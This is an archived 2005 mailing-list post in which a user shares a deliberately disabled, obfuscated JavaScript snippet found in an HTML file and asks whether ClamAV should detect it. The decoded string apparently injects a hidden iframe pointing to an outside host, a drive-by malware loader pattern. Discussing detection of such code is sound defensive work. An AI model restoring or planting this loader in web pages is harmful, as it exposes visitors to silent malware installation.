[ale] javascript Virus

Jim Popovitch jimpop at yahoo.com
Thu May 26 16:03:19 EDT 2005


I ran across the some javascript in an HTML file.  It is similar to the
following, except the following has been modified to not function.

   ------------------
     var k='?gly#v|oh%ylvlelolw|
            =#klggh>srvlwlrq=#devroxwh>#
            ohiw#>#wrs=#4%A?liudph#vuf@%
            kwws2xvhu431liudph1ux#iudpherughu at 3#
            yvsd@#vsdfh at 3#zlgwk at 4#khlw at 4#pdujlqzlgwk at 3#
            pdujhjkw at 3#vflqj at qrA?2lihA?2glyA'
     var t=9999;
     var h='';
     while( t<=k.length-1 ) {
       h = h+String.fromCharCode(k.charCodeAt(t++)-2);
     }
     document.write(h);
    ----------

The above (in it's original state), downloads and installs some nasty
things.  As it is above it is pretty harmless, but still potentially
dangerous.  

The question I have is this:  Shouldn't clamav see code like this as a
virus when scanning cached HTML on a filesystem?

-Jim P.






More information about the Ale mailing list